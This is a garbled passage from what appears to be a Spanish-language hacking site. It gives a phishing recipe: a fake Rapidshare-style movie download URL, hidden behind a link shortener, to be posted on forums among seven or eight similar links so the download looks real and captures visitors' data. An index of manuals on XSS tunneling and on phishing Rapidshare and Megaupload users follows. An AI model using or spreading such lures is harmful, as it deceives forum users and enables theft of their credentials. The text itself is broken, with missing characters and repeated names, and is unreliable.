http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-
tom.720p.part0..rar &file_description=www.mhd-hdhieu.com&file_size=95.78
MB%20MB&downloadID=UU4MWIIU
http://lix.in/-542849
Esta perfecto para dejarlo en algun foro,tendran que hacer eso mismo con 7 o 8
links para que parezca real la descarga de la pelicula o juego,voy a probralo a
ver si aun captura los datos con esta url camuflada
Va perfecto es asi de sencillo y rapido...
Autor : Xtazis
Gracias a todos por participar
Esteganografa (Shevchenko)
Manual Esteganograf
frozenfew)
XSS TUNELING (Max p0wer frozenfew
frozenfew)
Introduccin a XSS (Max p0wer frozenfew
Introducci
xtazis))
Manual Phiser Rapidshare 2009 (xtazis
xtazis))
Manual Phiser Megaupload 2009 (xtazis
www.level-23.com
Hack Tools